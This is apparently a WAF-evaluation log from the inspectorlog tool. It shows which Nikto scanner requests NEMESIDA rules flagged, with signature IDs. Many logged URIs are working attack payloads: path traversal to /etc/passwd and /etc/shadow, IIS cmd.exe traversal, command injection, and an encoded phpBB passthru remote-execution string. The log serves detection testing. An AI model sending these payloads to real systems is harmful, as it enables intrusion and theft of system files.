# inspectorlog v3.5
#----- Initializing Rules (NEMESIDA)  ---------------------
#	Opening NEMESIDA rule file /home/kali/Downloads/reglas_javi/nemesida/nemesida-rules-bin-20220109.txt...
#		Rules: read [506], erroneous [0], URI (URL|ARGS) [449]
#-----  Statistics (NEMESIDA) ------------------------------
# Read [506] nemesida rules, [449] http-related, [0] with errors
#----- Analysis results ----------------------------
# Alerts & signatures generated from: /home/kali/Downloads/inspectorlog/inspectorlog -l command_execution.uri -m /home/kali/Downloads/reglas_javi/nemesida/nemesida-rules-bin-20220109.txt -t list -o /home/kali/TFG/inspectorlog/nemesida/conf_personalizada/web_dinamica/owasp/opensource/nikto/command_execution.clean
Packet [7]	Uri [/web/RVwMAVrE.bat]	Nattacks [1]	Signatures	[300001562]
Packet [8]	Uri [/web/RVwMAVrE.pl]	Nattacks [1]	Signatures	[300001513]
Packet [11]	Uri [/web/RVwMAVrE.dll]	Nattacks [1]	Signatures	[300001562]
Packet [19]	Uri [/web/RVwMAVrE.exe]	Nattacks [1]	Signatures	[300001562]
Packet [21]	Uri [/web/RVwMAVrE.cfm]	Nattacks [1]	Signatures	[300001516]
Packet [25]	Uri [/web/RVwMAVrE.cgi]	Nattacks [1]	Signatures	[300001513]
Packet [61]	Uri [/web/typo3/dev/translations.php?ONLY=%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/boot.ini%00]	Nattacks [4]	Signatures	[300000057]	[300000067]	[300001145]	[300001359]
Packet [62]	Uri [/web/typo3/dev/translations.php?ONLY=%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/etc/hosts%00]	Nattacks [4]	Signatures	[300000057]	[300000067]	[300001145]	[300001359]
Packet [63]	Uri [/web/typo3/dev/translations.php?ONLY=%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/windows/win.ini%00]	Nattacks [4]	Signatures	[300000057]	[300000067]	[300001145]	[300001359]
Packet [64]	Uri [/web/typo3/dev/translations.php?ONLY=%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/winnt/win.ini%00]	Nattacks [4]	Signatures	[300000057]	[300000067]	[300001145]	[300001359]
Packet [65]	Uri [/web/typo3/dev/translations.php?ONLY=%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/etc/passwd%00]	Nattacks [5]	Signatures	[300000057]	[300000067]	[300001145]	[300001359]	[300001559]
Packet [66]	Uri [/web/typo3/dev/translations.php?ONLY=%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/HASH(0x56118416d7f0)%00]	Nattacks [4]	Signatures	[300000057]	[300000067]	[300001145]	[300001359]
Packet [86]	Uri [/web/168.sql]	Nattacks [1]	Signatures	[300001526]
Packet [87]	Uri [/web/168.sql]	Nattacks [1]	Signatures	[300001526]
Packet [90]	Uri [/web/192.168.1.101.war]	Nattacks [1]	Signatures	[300001516]
Packet [91]	Uri [/web/192.168.1.101.war]	Nattacks [1]	Signatures	[300001516]
Packet [94]	Uri [/web/101.sql]	Nattacks [1]	Signatures	[300001526]
Packet [95]	Uri [/web/101.sql]	Nattacks [1]	Signatures	[300001526]
Packet [110]	Uri [/web/1.war]	Nattacks [1]	Signatures	[300001516]
Packet [111]	Uri [/web/1.war]	Nattacks [1]	Signatures	[300001516]
Packet [112]	Uri [/web/192168.pem]	Nattacks [1]	Signatures	[300001925]
Packet [113]	Uri [/web/192168.pem]	Nattacks [1]	Signatures	[300001925]
Packet [128]	Uri [/web/1921681101.war]	Nattacks [1]	Signatures	[300001516]
Packet [129]	Uri [/web/1921681101.war]	Nattacks [1]	Signatures	[300001516]
Packet [130]	Uri [/web/192.168.pem]	Nattacks [1]	Signatures	[300001925]
Packet [131]	Uri [/web/192.168.pem]	Nattacks [1]	Signatures	[300001925]
Packet [134]	Uri [/web/1921681.war]	Nattacks [1]	Signatures	[300001516]
Packet [135]	Uri [/web/1921681.war]	Nattacks [1]	Signatures	[300001516]
Packet [136]	Uri [/web/1921681101.sql]	Nattacks [1]	Signatures	[300001526]
Packet [137]	Uri [/web/1921681101.sql]	Nattacks [1]	Signatures	[300001526]
Packet [150]	Uri [/web/backup.sql]	Nattacks [1]	Signatures	[300001526]
Packet [151]	Uri [/web/backup.sql]	Nattacks [1]	Signatures	[300001526]
Packet [152]	Uri [/web/192.168.1.war]	Nattacks [1]	Signatures	[300001516]
Packet [153]	Uri [/web/192.168.1.war]	Nattacks [1]	Signatures	[300001516]
Packet [154]	Uri [/web/site.pem]	Nattacks [1]	Signatures	[300001925]
Packet [155]	Uri [/web/site.pem]	Nattacks [1]	Signatures	[300001925]
Packet [176]	Uri [/web/1921681.sql]	Nattacks [1]	Signatures	[300001526]
Packet [177]	Uri [/web/1921681.sql]	Nattacks [1]	Signatures	[300001526]
Packet [178]	Uri [/web/192.168.1.101.sql]	Nattacks [1]	Signatures	[300001526]
Packet [179]	Uri [/web/192.168.1.101.sql]	Nattacks [1]	Signatures	[300001526]
Packet [184]	Uri [/web/backup.tar]	Nattacks [2]	Signatures	[300001519]	[300002752]
Packet [185]	Uri [/web/backup.tar]	Nattacks [2]	Signatures	[300001519]	[300002752]
Packet [192]	Uri [/web/1921681101.pem]	Nattacks [1]	Signatures	[300001925]
Packet [193]	Uri [/web/1921681101.pem]	Nattacks [1]	Signatures	[300001925]
Packet [198]	Uri [/web/backup.pem]	Nattacks [1]	Signatures	[300001925]
Packet [199]	Uri [/web/backup.pem]	Nattacks [1]	Signatures	[300001925]
Packet [210]	Uri [/web/192.168.1.pem]	Nattacks [1]	Signatures	[300001925]
Packet [211]	Uri [/web/192.168.1.pem]	Nattacks [1]	Signatures	[300001925]
Packet [214]	Uri [/web/192.pem]	Nattacks [1]	Signatures	[300001925]
Packet [215]	Uri [/web/192.pem]	Nattacks [1]	Signatures	[300001925]
Packet [222]	Uri [/web/192168.sql]	Nattacks [1]	Signatures	[300001526]
Packet [223]	Uri [/web/192168.sql]	Nattacks [1]	Signatures	[300001526]
Packet [224]	Uri [/web/192_168_1_101.pem]	Nattacks [1]	Signatures	[300001925]
Packet [225]	Uri [/web/192_168_1_101.pem]	Nattacks [1]	Signatures	[300001925]
Packet [232]	Uri [/web/192.war]	Nattacks [1]	Signatures	[300001516]
Packet [233]	Uri [/web/192.war]	Nattacks [1]	Signatures	[300001516]
Packet [256]	Uri [/web/backup.war]	Nattacks [1]	Signatures	[300001516]
Packet [257]	Uri [/web/backup.war]	Nattacks [1]	Signatures	[300001516]
Packet [268]	Uri [/web/site.war]	Nattacks [1]	Signatures	[300001516]
Packet [269]	Uri [/web/site.war]	Nattacks [1]	Signatures	[300001516]
Packet [280]	Uri [/web/192.168.sql]	Nattacks [1]	Signatures	[300001526]
Packet [281]	Uri [/web/192.168.sql]	Nattacks [1]	Signatures	[300001526]
Packet [286]	Uri [/web/1.pem]	Nattacks [1]	Signatures	[300001925]
Packet [287]	Uri [/web/1.pem]	Nattacks [1]	Signatures	[300001925]
Packet [288]	Uri [/web/101.pem]	Nattacks [1]	Signatures	[300001925]
Packet [289]	Uri [/web/101.pem]	Nattacks [1]	Signatures	[300001925]
Packet [292]	Uri [/web/168.war]	Nattacks [1]	Signatures	[300001516]
Packet [293]	Uri [/web/168.war]	Nattacks [1]	Signatures	[300001516]
Packet [296]	Uri [/web/168.pem]	Nattacks [1]	Signatures	[300001925]
Packet [297]	Uri [/web/168.pem]	Nattacks [1]	Signatures	[300001925]
Packet [300]	Uri [/web/192_168_1_101.war]	Nattacks [1]	Signatures	[300001516]
Packet [301]	Uri [/web/192_168_1_101.war]	Nattacks [1]	Signatures	[300001516]
Packet [302]	Uri [/web/101.war]	Nattacks [1]	Signatures	[300001516]
Packet [303]	Uri [/web/101.war]	Nattacks [1]	Signatures	[300001516]
Packet [306]	Uri [/web/backup.zip]	Nattacks [1]	Signatures	[300002752]
Packet [307]	Uri [/web/backup.zip]	Nattacks [1]	Signatures	[300002752]
Packet [310]	Uri [/web/1.sql]	Nattacks [1]	Signatures	[300001526]
Packet [311]	Uri [/web/1.sql]	Nattacks [1]	Signatures	[300001526]
Packet [332]	Uri [/web/192168.war]	Nattacks [1]	Signatures	[300001516]
Packet [333]	Uri [/web/192168.war]	Nattacks [1]	Signatures	[300001516]
Packet [334]	Uri [/web/192.168.war]	Nattacks [1]	Signatures	[300001516]
Packet [335]	Uri [/web/192.168.war]	Nattacks [1]	Signatures	[300001516]
Packet [350]	Uri [/web/192.168.1.101.pem]	Nattacks [1]	Signatures	[300001925]
Packet [351]	Uri [/web/192.168.1.101.pem]	Nattacks [1]	Signatures	[300001925]
Packet [360]	Uri [/web/192.sql]	Nattacks [1]	Signatures	[300001526]
Packet [361]	Uri [/web/192.sql]	Nattacks [1]	Signatures	[300001526]
Packet [380]	Uri [/web/site.sql]	Nattacks [1]	Signatures	[300001526]
Packet [381]	Uri [/web/site.sql]	Nattacks [1]	Signatures	[300001526]
Packet [388]	Uri [/web/192.168.1.sql]	Nattacks [1]	Signatures	[300001526]
Packet [389]	Uri [/web/192.168.1.sql]	Nattacks [1]	Signatures	[300001526]
Packet [402]	Uri [/web/192_168_1_101.sql]	Nattacks [1]	Signatures	[300001526]
Packet [403]	Uri [/web/192_168_1_101.sql]	Nattacks [1]	Signatures	[300001526]
Packet [404]	Uri [/web/backup.tar.gz]	Nattacks [2]	Signatures	[300001519]	[300002752]
Packet [405]	Uri [/web/backup.tar.gz]	Nattacks [2]	Signatures	[300001519]	[300002752]
Packet [406]	Uri [/web/1921681.pem]	Nattacks [1]	Signatures	[300001925]
Packet [407]	Uri [/web/1921681.pem]	Nattacks [1]	Signatures	[300001925]
Packet [428]	Uri [/web/index.cfm]	Nattacks [1]	Signatures	[300001516]
Packet [429]	Uri [/web/index.cgi]	Nattacks [1]	Signatures	[300001513]
Packet [430]	Uri [/web/index.pl]	Nattacks [1]	Signatures	[300001513]
Packet [438]	Uri [/web/index.jsp]	Nattacks [1]	Signatures	[300001516]
Packet [449]	Uri [/web/admin.cgi]	Nattacks [1]	Signatures	[300001513]
Packet [450]	Uri [/web/administrator.cgi]	Nattacks [1]	Signatures	[300001513]
Packet [451]	Uri [/web/authLogin.cgi]	Nattacks [1]	Signatures	[300001513]
Packet [453]	Uri [/web/banner.cgi]	Nattacks [1]	Signatures	[300001513]
Packet [454]	Uri [/web/book.cgi]	Nattacks [1]	Signatures	[300001513]
Packet [455]	Uri [/web/cgiinfo.cgi]	Nattacks [1]	Signatures	[300001513]
Packet [456]	Uri [/web/cgitest.py]	Nattacks [1]	Signatures	[300001513]
Packet [458]	Uri [/web/contact.cgi]	Nattacks [1]	Signatures	[300001513]
Packet [459]	Uri [/web/count.cgi]	Nattacks [1]	Signatures	[300001513]
Packet [460]	Uri [/web/defaultwebpage.cgi]	Nattacks [1]	Signatures	[300001513]
Packet [461]	Uri [/web/download.cgi]	Nattacks [1]	Signatures	[300001513]
Packet [462]	Uri [/web/entropysearch.cgi]	Nattacks [1]	Signatures	[300001513]
Packet [463]	Uri [/web/env.cgi]	Nattacks [1]	Signatures	[300001513]
Packet [464]	Uri [/web/environment.cgi]	Nattacks [1]	Signatures	[300001513]
Packet [466]	Uri [/web/formmail.cgi]	Nattacks [1]	Signatures	[300001513]
Packet [467]	Uri [/web/FormMail-clone.cgi]	Nattacks [1]	Signatures	[300001513]
Packet [468]	Uri [/web/guestbook.cgi]	Nattacks [1]	Signatures	[300001513]
Packet [469]	Uri [/web/helpdesk.cgi]	Nattacks [1]	Signatures	[300001513]
Packet [470]	Uri [/web/index.cgi]	Nattacks [1]	Signatures	[300001513]
Packet [472]	Uri [/web/index.pl]	Nattacks [1]	Signatures	[300001513]
Packet [473]	Uri [/web/info.cgi]	Nattacks [1]	Signatures	[300001513]
Packet [475]	Uri [/web/loadpage.cgi]	Nattacks [1]	Signatures	[300001513]
Packet [476]	Uri [/web/login.cgi]	Nattacks [1]	Signatures	[300001513]
Packet [478]	Uri [/web/login.pl]	Nattacks [1]	Signatures	[300001513]
Packet [479]	Uri [/web/pathtest.pl]	Nattacks [1]	Signatures	[300001513]
Packet [484]	Uri [/web/php.cgi]	Nattacks [1]	Signatures	[300001513]
Packet [486]	Uri [/web/printenv]	Nattacks [1]	Signatures	[300001826]
Packet [487]	Uri [/web/restore_config.cgi]	Nattacks [1]	Signatures	[300001513]
Packet [488]	Uri [/web/ruby.rb]	Nattacks [1]	Signatures	[300001505]
Packet [490]	Uri [/web/search.cgi]	Nattacks [1]	Signatures	[300001513]
Packet [493]	Uri [/web/sysinfo.pl]	Nattacks [1]	Signatures	[300001513]
Packet [496]	Uri [/web/test.cgi]	Nattacks [1]	Signatures	[300001513]
Packet [499]	Uri [/web/test_cgi.pl]	Nattacks [1]	Signatures	[300001513]
Packet [500]	Uri [/web/test-cgi.pl]	Nattacks [1]	Signatures	[300001513]
Packet [501]	Uri [/web/test.py]	Nattacks [1]	Signatures	[300001513]
Packet [503]	Uri [/web/tmUnblock.cgi]	Nattacks [1]	Signatures	[300001513]
Packet [504]	Uri [/web/uname.cgi]	Nattacks [1]	Signatures	[300001513]
Packet [505]	Uri [/web/viewcvs.cgi]	Nattacks [1]	Signatures	[300001513]
Packet [507]	Uri [/web/whois.cgi]	Nattacks [1]	Signatures	[300001513]
Packet [509]	Uri [/web/../../../../../../../../../../../../etc/shadow]	Nattacks [3]	Signatures	[300000057]	[300000067]	[300001559]
Packet [513]	Uri [/web/cfappman/index.cfm]	Nattacks [1]	Signatures	[300001516]
Packet [514]	Uri [/web/cfdocs/examples/cvbeans/beaninfo.cfm]	Nattacks [1]	Signatures	[300001516]
Packet [515]	Uri [/web/cfdocs/examples/parks/detail.cfm]	Nattacks [1]	Signatures	[300001516]
Packet [524]	Uri [/web/forumdisplay.php?GLOBALS\[\]=1&f=2&comma=\".system\('id'\)\.\"]	Nattacks [3]	Signatures	[300000052]	[300000058]	[300001026]
Packet [528]	Uri [/web/cartcart.cgi]	Nattacks [1]	Signatures	[300001513]
Packet [529]	Uri [/web/scripts/Carello/Carello.dll]	Nattacks [1]	Signatures	[300001562]
Packet [536]	Uri [/web/c/winnt/system32/cmd.exe?/c+dir+/OG]	Nattacks [1]	Signatures	[300001562]
Packet [537]	Uri [/web/msadc/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir+c:%5c]	Nattacks [3]	Signatures	[300000057]	[300000067]	[300001562]
Packet [538]	Uri [/web/msadc/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir+c:%5c]	Nattacks [3]	Signatures	[300000057]	[300000067]	[300001562]
Packet [540]	Uri [/web/athenareg.php?pass=%20;cat%20/etc/passwd]	Nattacks [2]	Signatures	[300000051]	[300001559]
Packet [541]	Uri [/web/cd-cgi/sscd_suncourier.pl]	Nattacks [1]	Signatures	[300001513]
Packet [544]	Uri [/web/cgi-bin/webdist.cgi]	Nattacks [1]	Signatures	[300001513]
Packet [546]	Uri [/web/ews/ews/architext_query.pl]	Nattacks [1]	Signatures	[300001513]
Packet [549]	Uri [/web/cfdocs/snippets/gettempdirectory.cfm]	Nattacks [1]	Signatures	[300001516]
Packet [553]	Uri [/web/mods/apage/apage.cgi?f=file.htm.|id|]	Nattacks [1]	Signatures	[300001513]
Packet [556]	Uri [/web/perl/-e%20%22system('cat%20/etc/passwd');\%22]	Nattacks [4]	Signatures	[300000051]	[300000052]	[300001026]	[300001559]
Packet [656]	Uri [/web/index.php?name=Forums&file=viewtopic&t=2&rush=%64%69%72&highlight=%2527.%70%61%73%73%74%68%72%75%28%24%48%54%54%50%5f%47%45%54%5f%56%41%52%53%5b%72%75%73%68%5d%29.%2527]	Nattacks [1]	Signatures	[300002802]
Packet [657]	Uri [/web/viewtopic.php?t=2&rush=%64%69%72&highlight=%2527.%70%61%73%73%74%68%72%75%28%24%48%54%54%50%5f%47%45%54%5f%56%41%52%53%5b%72%75%73%68%5d%29.%2527]	Nattacks [1]	Signatures	[300002802]
Packet [658]	Uri [/web/index.php?Nikto=Forums&file=viewtopic&t=2&rush=%64%69%72&highlight=%2527.%70%61%73%73%74%68%72%75%28%24%48%54%54%50%5f%47%45%54%5f%56%41%52%53%5b%72%75%73%68%5d%29.%2527]	Nattacks [1]	Signatures	[300002802]
Packet [659]	Uri [/web/postnuke/index.php?Nikto=Forums&file=viewtopic&t=2&rush=%64%69%72&highlight=%2527.%70%61%73%73%74%68%72%75%28%24%48%54%54%50%5f%47%45%54%5f%56%41%52%53%5b%72%75%73%68%5d%29.%2527]	Nattacks [1]	Signatures	[300002802]
Packet [660]	Uri [/web/postnuke/html/index.php?Nikto=Forums&file=viewtopic&t=2&rush=%64%69%72&highlight=%2527.%70%61%73%73%74%68%72%75%28%24%48%54%54%50%5f%47%45%54%5f%56%41%52%53%5b%72%75%73%68%5d%29.%2527]	Nattacks [1]	Signatures	[300002802]
Packet [661]	Uri [/web/modules/index.php?Nikto=Forums&file=viewtopic&t=2&rush=%64%69%72&highlight=%2527.%70%61%73%73%74%68%72%75%28%24%48%54%54%50%5f%47%45%54%5f%56%41%52%53%5b%72%75%73%68%5d%29.%2527]	Nattacks [1]	Signatures	[300002802]
Packet [662]	Uri [/web/phpBB/index.php?Nikto=Forums&file=viewtopic&t=2&rush=%64%69%72&highlight=%2527.%70%61%73%73%74%68%72%75%28%24%48%54%54%50%5f%47%45%54%5f%56%41%52%53%5b%72%75%73%68%5d%29.%2527]	Nattacks [1]	Signatures	[300002802]
Packet [663]	Uri [/web/forum/index.php?Nikto=Forums&file=viewtopic&t=2&rush=%64%69%72&highlight=%2527.%70%61%73%73%74%68%72%75%28%24%48%54%54%50%5f%47%45%54%5f%56%41%52%53%5b%72%75%73%68%5d%29.%2527]	Nattacks [1]	Signatures	[300002802]
Packet [664]	Uri [/web/index.php?name=Forums&file=viewtopic&t=2&rush=%64%69%72&highlight=%2527.%70%61%73%73%74%68%72%75%28%24%48%54%54%50%5f%47%45%54%5f%56%41%52%53%5b%72%75%73%68%5d%29.%2527]	Nattacks [1]	Signatures	[300002802]
Packet [665]	Uri [/web/postnuke/index.php?name=Forums&file=viewtopic&t=2&rush=%64%69%72&highlight=%2527.%70%61%73%73%74%68%72%75%28%24%48%54%54%50%5f%47%45%54%5f%56%41%52%53%5b%72%75%73%68%5d%29.%2527]	Nattacks [1]	Signatures	[300002802]
Packet [666]	Uri [/web/postnuke/html/index.php?name=Forums&file=viewtopic&t=2&rush=%64%69%72&highlight=%2527.%70%61%73%73%74%68%72%75%28%24%48%54%54%50%5f%47%45%54%5f%56%41%52%53%5b%72%75%73%68%5d%29.%2527]	Nattacks [1]	Signatures	[300002802]
Packet [667]	Uri [/web/modules/index.php?name=Forums&file=viewtopic&t=2&rush=%64%69%72&highlight=%2527.%70%61%73%73%74%68%72%75%28%24%48%54%54%50%5f%47%45%54%5f%56%41%52%53%5b%72%75%73%68%5d%29.%2527]	Nattacks [1]	Signatures	[300002802]
Packet [668]	Uri [/web/phpBB/index.php?name=Forums&file=viewtopic&t=2&rush=%64%69%72&highlight=%2527.%70%61%73%73%74%68%72%75%28%24%48%54%54%50%5f%47%45%54%5f%56%41%52%53%5b%72%75%73%68%5d%29.%2527]	Nattacks [1]	Signatures	[300002802]
Packet [669]	Uri [/web/forum/index.php?name=Forums&file=viewtopic&t=2&rush=%64%69%72&highlight=%2527.%70%61%73%73%74%68%72%75%28%24%48%54%54%50%5f%47%45%54%5f%56%41%52%53%5b%72%75%73%68%5d%29.%2527]	Nattacks [1]	Signatures	[300002802]
Packet [670]	Uri [/web/index.php?Nikto=forums&file=viewtopic&t=2&rush=%64%69%72&highlight=%2527.%70%61%73%73%74%68%72%75%28%24%48%54%54%50%5f%47%45%54%5f%56%41%52%53%5b%72%75%73%68%5d%29.%2527]	Nattacks [1]	Signatures	[300002802]
Packet [671]	Uri [/web/postnuke/index.php?Nikto=forums&file=viewtopic&t=2&rush=%64%69%72&highlight=%2527.%70%61%73%73%74%68%72%75%28%24%48%54%54%50%5f%47%45%54%5f%56%41%52%53%5b%72%75%73%68%5d%29.%2527]	Nattacks [1]	Signatures	[300002802]
Packet [672]	Uri [/web/postnuke/html/index.php?Nikto=forums&file=viewtopic&t=2&rush=%64%69%72&highlight=%2527.%70%61%73%73%74%68%72%75%28%24%48%54%54%50%5f%47%45%54%5f%56%41%52%53%5b%72%75%73%68%5d%29.%2527]	Nattacks [1]	Signatures	[300002802]
Packet [673]	Uri [/web/modules/index.php?Nikto=forums&file=viewtopic&t=2&rush=%64%69%72&highlight=%2527.%70%61%73%73%74%68%72%75%28%24%48%54%54%50%5f%47%45%54%5f%56%41%52%53%5b%72%75%73%68%5d%29.%2527]	Nattacks [1]	Signatures	[300002802]
Packet [674]	Uri [/web/phpBB/index.php?Nikto=forums&file=viewtopic&t=2&rush=%64%69%72&highlight=%2527.%70%61%73%73%74%68%72%75%28%24%48%54%54%50%5f%47%45%54%5f%56%41%52%53%5b%72%75%73%68%5d%29.%2527]	Nattacks [1]	Signatures	[300002802]
Packet [675]	Uri [/web/forum/index.php?Nikto=forums&file=viewtopic&t=2&rush=%64%69%72&highlight=%2527.%70%61%73%73%74%68%72%75%28%24%48%54%54%50%5f%47%45%54%5f%56%41%52%53%5b%72%75%73%68%5d%29.%2527]	Nattacks [1]	Signatures	[300002802]
Packet [676]	Uri [/web/index.php?name=forums&file=viewtopic&t=2&rush=%64%69%72&highlight=%2527.%70%61%73%73%74%68%72%75%28%24%48%54%54%50%5f%47%45%54%5f%56%41%52%53%5b%72%75%73%68%5d%29.%2527]	Nattacks [1]	Signatures	[300002802]
Packet [677]	Uri [/web/postnuke/index.php?name=forums&file=viewtopic&t=2&rush=%64%69%72&highlight=%2527.%70%61%73%73%74%68%72%75%28%24%48%54%54%50%5f%47%45%54%5f%56%41%52%53%5b%72%75%73%68%5d%29.%2527]	Nattacks [1]	Signatures	[300002802]
Packet [678]	Uri [/web/postnuke/html/index.php?name=forums&file=viewtopic&t=2&rush=%64%69%72&highlight=%2527.%70%61%73%73%74%68%72%75%28%24%48%54%54%50%5f%47%45%54%5f%56%41%52%53%5b%72%75%73%68%5d%29.%2527]	Nattacks [1]	Signatures	[300002802]
Packet [679]	Uri [/web/modules/index.php?name=forums&file=viewtopic&t=2&rush=%64%69%72&highlight=%2527.%70%61%73%73%74%68%72%75%28%24%48%54%54%50%5f%47%45%54%5f%56%41%52%53%5b%72%75%73%68%5d%29.%2527]	Nattacks [1]	Signatures	[300002802]
Packet [680]	Uri [/web/phpBB/index.php?name=forums&file=viewtopic&t=2&rush=%64%69%72&highlight=%2527.%70%61%73%73%74%68%72%75%28%24%48%54%54%50%5f%47%45%54%5f%56%41%52%53%5b%72%75%73%68%5d%29.%2527]	Nattacks [1]	Signatures	[300002802]
Packet [681]	Uri [/web/forum/index.php?name=forums&file=viewtopic&t=2&rush=%64%69%72&highlight=%2527.%70%61%73%73%74%68%72%75%28%24%48%54%54%50%5f%47%45%54%5f%56%41%52%53%5b%72%75%73%68%5d%29.%2527]	Nattacks [1]	Signatures	[300002802]
Packet [682]	Uri [/web/viewtopic.php?t=2&rush=%64%69%72&highlight=%2527.%70%61%73%73%74%68%72%75%28%24%48%54%54%50%5f%47%45%54%5f%56%41%52%53%5b%72%75%73%68%5d%29.%2527]	Nattacks [1]	Signatures	[300002802]
Packet [683]	Uri [/web/postnuke/viewtopic.php?t=2&rush=%64%69%72&highlight=%2527.%70%61%73%73%74%68%72%75%28%24%48%54%54%50%5f%47%45%54%5f%56%41%52%53%5b%72%75%73%68%5d%29.%2527]	Nattacks [1]	Signatures	[300002802]
Packet [684]	Uri [/web/postnuke/html/viewtopic.php?t=2&rush=%64%69%72&highlight=%2527.%70%61%73%73%74%68%72%75%28%24%48%54%54%50%5f%47%45%54%5f%56%41%52%53%5b%72%75%73%68%5d%29.%2527]	Nattacks [1]	Signatures	[300002802]
Packet [685]	Uri [/web/modules/viewtopic.php?t=2&rush=%64%69%72&highlight=%2527.%70%61%73%73%74%68%72%75%28%24%48%54%54%50%5f%47%45%54%5f%56%41%52%53%5b%72%75%73%68%5d%29.%2527]	Nattacks [1]	Signatures	[300002802]
Packet [686]	Uri [/web/phpBB/viewtopic.php?t=2&rush=%64%69%72&highlight=%2527.%70%61%73%73%74%68%72%75%28%24%48%54%54%50%5f%47%45%54%5f%56%41%52%53%5b%72%75%73%68%5d%29.%2527]	Nattacks [1]	Signatures	[300002802]
Packet [687]	Uri [/web/forum/viewtopic.php?t=2&rush=%64%69%72&highlight=%2527.%70%61%73%73%74%68%72%75%28%24%48%54%54%50%5f%47%45%54%5f%56%41%52%53%5b%72%75%73%68%5d%29.%2527]	Nattacks [1]	Signatures	[300002802]
Packet [688]	Uri [/web/index.php?name=PNphpBB2&file=viewtopic&t=2&rush=%64%69%72&highlight=%2527.%70%61%73%73%74%68%72%75%28%24%48%54%54%50%5f%47%45%54%5f%56%41%52%53%5b%72%75%73%68%5d%29.%2527]	Nattacks [1]	Signatures	[300002802]
Packet [689]	Uri [/web/index.php?name=Forums&file=viewtopic&t=2&rush=%6c%73%20%2d%61%6c&highlight=%2527.%70%61%73%73%74%68%72%75%28%24%48%54%54%50%5f%47%45%54%5f%56%41%52%53%5b%72%75%73%68%5d%29.%2527]	Nattacks [1]	Signatures	[300002802]
Packet [690]	Uri [/web/index.php?name=forums&file=viewtopic&t=2&rush=%6c%73%20%2d%61%6c&highlight=%2527.%70%61%73%73%74%68%72%75%28%24%48%54%54%50%5f%47%45%54%5f%56%41%52%53%5b%72%75%73%68%5d%29.%2527]	Nattacks [1]	Signatures	[300002802]
Packet [691]	Uri [/web/viewtopic.php?t=2&rush=%6c%73%20%2d%61%6c&highlight=%2527.%70%61%73%73%74%68%72%75%28%24%48%54%54%50%5f%47%45%54%5f%56%41%52%53%5b%72%75%73%68%5d%29.%2527]	Nattacks [1]	Signatures	[300002802]
Packet [692]	Uri [/web/index.php?Nikto=Forums&file=viewtopic&t=2&rush=%6c%73%20%2d%61%6c&highlight=%2527.%70%61%73%73%74%68%72%75%28%24%48%54%54%50%5f%47%45%54%5f%56%41%52%53%5b%72%75%73%68%5d%29.%2527]	Nattacks [1]	Signatures	[300002802]
Packet [693]	Uri [/web/postnuke/index.php?Nikto=Forums&file=viewtopic&t=2&rush=%6c%73%20%2d%61%6c&highlight=%2527.%70%61%73%73%74%68%72%75%28%24%48%54%54%50%5f%47%45%54%5f%56%41%52%53%5b%72%75%73%68%5d%29.%2527]	Nattacks [1]	Signatures	[300002802]
Packet [694]	Uri [/web/postnuke/html/index.php?Nikto=Forums&file=viewtopic&t=2&rush=%6c%73%20%2d%61%6c&highlight=%2527.%70%61%73%73%74%68%72%75%28%24%48%54%54%50%5f%47%45%54%5f%56%41%52%53%5b%72%75%73%68%5d%29.%2527]	Nattacks [1]	Signatures	[300002802]
Packet [695]	Uri [/web/modules/index.php?Nikto=Forums&file=viewtopic&t=2&rush=%6c%73%20%2d%61%6c&highlight=%2527.%70%61%73%73%74%68%72%75%28%24%48%54%54%50%5f%47%45%54%5f%56%41%52%53%5b%72%75%73%68%5d%29.%2527]	Nattacks [1]	Signatures	[300002802]
Packet [696]	Uri [/web/phpBB/index.php?Nikto=Forums&file=viewtopic&t=2&rush=%6c%73%20%2d%61%6c&highlight=%2527.%70%61%73%73%74%68%72%75%28%24%48%54%54%50%5f%47%45%54%5f%56%41%52%53%5b%72%75%73%68%5d%29.%2527]	Nattacks [1]	Signatures	[300002802]
Packet [697]	Uri [/web/forum/index.php?Nikto=Forums&file=viewtopic&t=2&rush=%6c%73%20%2d%61%6c&highlight=%2527.%70%61%73%73%74%68%72%75%28%24%48%54%54%50%5f%47%45%54%5f%56%41%52%53%5b%72%75%73%68%5d%29.%2527]	Nattacks [1]	Signatures	[300002802]
Packet [698]	Uri [/web/index.php?name=Forums&file=viewtopic&t=2&rush=%6c%73%20%2d%61%6c&highlight=%2527.%70%61%73%73%74%68%72%75%28%24%48%54%54%50%5f%47%45%54%5f%56%41%52%53%5b%72%75%73%68%5d%29.%2527]	Nattacks [1]	Signatures	[300002802]
Packet [699]	Uri [/web/postnuke/index.php?name=Forums&file=viewtopic&t=2&rush=%6c%73%20%2d%61%6c&highlight=%2527.%70%61%73%73%74%68%72%75%28%24%48%54%54%50%5f%47%45%54%5f%56%41%52%53%5b%72%75%73%68%5d%29.%2527]	Nattacks [1]	Signatures	[300002802]
Packet [700]	Uri [/web/postnuke/html/index.php?name=Forums&file=viewtopic&t=2&rush=%6c%73%20%2d%61%6c&highlight=%2527.%70%61%73%73%74%68%72%75%28%24%48%54%54%50%5f%47%45%54%5f%56%41%52%53%5b%72%75%73%68%5d%29.%2527]	Nattacks [1]	Signatures	[300002802]
Packet [701]	Uri [/web/modules/index.php?name=Forums&file=viewtopic&t=2&rush=%6c%73%20%2d%61%6c&highlight=%2527.%70%61%73%73%74%68%72%75%28%24%48%54%54%50%5f%47%45%54%5f%56%41%52%53%5b%72%75%73%68%5d%29.%2527]	Nattacks [1]	Signatures	[300002802]
Packet [702]	Uri [/web/phpBB/index.php?name=Forums&file=viewtopic&t=2&rush=%6c%73%20%2d%61%6c&highlight=%2527.%70%61%73%73%74%68%72%75%28%24%48%54%54%50%5f%47%45%54%5f%56%41%52%53%5b%72%75%73%68%5d%29.%2527]	Nattacks [1]	Signatures	[300002802]
Packet [703]	Uri [/web/forum/index.php?name=Forums&file=viewtopic&t=2&rush=%6c%73%20%2d%61%6c&highlight=%2527.%70%61%73%73%74%68%72%75%28%24%48%54%54%50%5f%47%45%54%5f%56%41%52%53%5b%72%75%73%68%5d%29.%2527]	Nattacks [1]	Signatures	[300002802]
